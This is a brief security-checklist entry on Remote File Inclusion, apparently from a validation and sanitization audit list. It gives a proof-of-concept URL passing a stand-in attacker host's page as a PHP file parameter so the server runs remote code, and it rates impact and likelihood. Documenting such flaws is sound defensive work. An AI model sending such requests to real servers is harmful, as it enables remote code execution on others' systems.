V5 - Validation/Sanitization
Remote File Inclusion
POC
Call a remote file as below: http://vulnerablehost/vulnpage.php?file=http://attackersite/malicouspage In this case the remote file is going to be included and any code contained in it is going to be run by the server.
Impact
Medium-High
Likelihood
Medium-High